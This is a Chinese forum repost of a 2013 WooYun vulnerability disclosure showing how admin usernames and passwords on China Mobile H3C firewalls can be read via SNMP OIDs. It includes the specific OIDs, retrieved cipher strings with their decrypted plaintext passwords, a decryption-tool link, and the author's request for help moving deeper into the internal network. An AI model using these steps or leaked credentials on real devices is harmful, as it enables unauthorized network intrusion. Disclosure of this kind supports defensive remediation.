标题:
中国移动H3C防火墙侧漏利用snmp获取管理员密码成功登录设备
[打印本页]
作者:
linda
时间:
2015-1-4 09:44
标题:
中国移动H3C防火墙侧漏利用snmp获取管理员密码成功登录设备
漏洞概要
缺陷编号:
WooYun-2013-32456
漏洞标题: 中国移动H3C防火墙侧漏利用snmp获取管理员密码成功登录设备
相关厂商:
中国移动
漏洞作者:
路人甲
提交时间: 2013-07-26 18:57
公开时间: 2013-09-09 18:58
漏洞类型: 系统/服务补丁不及时
危害等级: 低
自评Rank: 5
漏洞状态: 已交由第三方厂商(cncert国家互联网应急中心)处理
漏洞来源:
http://www.wooyun.org
Tags标签: 无
漏洞详情披露状态:
2013-07-26: 细节已通知厂商并且等待厂商处理中
2013-07-30: 厂商已经确认,细节仅向厂商公开
2013-08-09: 细节向核心白帽子及相关领域专家公开
2013-08-19: 细节向普通白帽子公开
2013-08-29: 细节向实习白帽子公开
2013-09-09: 细节向公众公开
简要描述:
管理员用户名和密码可以通过snmp读取,从而获得管理权限。h3c的私有mib有两种,一种是2011(huawei h3c),一种是25506(hh3c)。经过测试发现,有些设备只支持一种。如果一种获取不到数据,可以两种都尝试下。相关的oid为:
详细说明:
1.3.6.1.4.1.2011.10.2.12.1.1.1.1.1 h3cUserName OCTET-STRING admin
1.3.6.1.4.1.2011.10.2.12.1.1.1.1.2 h3cUserName OCTET-STRING h3c
1.3.6.1.4.1.2011.10.2.12.1.1.1.1.3 h3cUserName OCTET-STRING pppoe
1.3.6.1.4.1.2011.10.2.12.1.1.1.2.1 h3cUserPassword OCTET-STRING .]@USE=B,53Q=^Q`MAF4<1!!
1.3.6.1.4.1.2011.10.2.12.1.1.1.2.2 h3cUserPassword OCTET-STRING test
1.3.6.1.4.1.2011.10.2.12.1.1.1.2.3 h3cUserPassword OCTET-STRING pppoe
1.3.6.1.4.1.2011.10.2.12.1.1.1.1.1为用户名,
如果有多个用户则最后一位依次为2,3...
1.3.6.1.4.1.2011.10.2.12.1.1.1.2.1为第一个用户的密码,以此类推。
后面还有一些oid可以获取用户用户是否有管理权限等。需要详细研究的话可以walk一下看看。
漏洞证明:
25506 相关的oid为:
1.3.6.1.4.1.25506.2.12.1.1.1.1.1 h3c
1.3.6.1.4.1.25506.2.12.1.1.1.2.1 P.KG0>5&YV3;5#)%#Z[VS1!!
1.3.6.1.4.1.25506.2.12.1.1.1.3.1 7
1.3.6.1.4.1.25506.2.12.1.1.1.4.1 3
1.3.6.1.4.1.25506.2.12.1.1.1.5.1 0
1.3.6.1.4.1.25506.2.12.1.1.1.6.1 1
同样,第一个为用户名,第二个为密码。
获取到的密码是一个加密的字符串。解密工具:
https://github.com/grutz/h3c-pt-tools/blob/master/hh3c_cipher.py
.]@USE=B,53Q=^Q`MAF4<1!!: admin
-AO7S27&QTCQ=^Q`MAF4<1!!: h3c123
P.KG0>5&YV3;5#)%#Z[VS1!!: Zjyd_h3c_10
如上,可以直接得到明文的密码。然后就可以在web登录了。
后续渗透,求讨论。获取了防火墙的管理权限,如果继续渗透内网。~~~可以ssh开ssh连上去,不知道有木有抓包,转发流量的命令啊。
修复方案:
版权声明:转载请注明来源
路人甲
@
乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:13
确认时间:2013-07-30 22:01
厂商回复:
最新状态:
暂无
原文:
http://www.wooyun.org/bugs/wooyun-2013-032456
[
本帖最后由 linda 于 2016-2-15 17:37 编辑
]
欢迎光临 中神通公司技术论坛 (http://trustcomputing.com.cn/bbs/)
Powered by Discuz! 6.0.0
